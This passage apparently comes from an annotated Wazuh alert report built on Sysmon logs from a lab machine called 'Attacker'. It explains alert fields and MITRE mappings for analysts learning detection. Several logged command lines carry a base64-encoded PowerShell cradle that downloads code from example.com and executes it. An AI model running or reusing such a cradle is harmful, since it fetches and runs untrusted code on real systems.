Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534301.1604168
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:19.2856439Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284499
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:19.204 ProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ProcessId: 15800 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_tfqszefa.cbk.ps1 CreationUtcTime: 2025-04-24 22:38:19.204 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:19.204
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_tfqszefa.cbk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:19.204
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:24.377+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:24.377+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  69
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534304.1606937
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:22.3661813Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284546
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:20.548 ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ProcessId: 15900 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd59-680a-700b-000000000e00} ParentProcessId: 15800 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:20.548
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd59-680a-700b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15800
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:24.380+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:24.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  73
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534304.1615008
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:22.5603577Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284547
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:22.512 ProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ProcessId: 15900 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_uba1xjco.x5u.ps1 CreationUtcTime: 2025-04-24 22:38:22.512 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:22.512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_uba1xjco.x5u.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:22.512
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:27.447+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:27.447+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  70
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534307.1617777
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:25.2469858Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284576
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:23.806 ProcessGuid: {94294ddc-bd5f-680a-740b-000000000e00} ProcessId: 16016 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd5c-680a-720b-000000000e00} ParentProcessId: 15900 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:23.806
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd5f-680a-740b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16016
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd5c-680a-720b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  15900
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:27.462+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:27.462+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  74
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534307.1625848
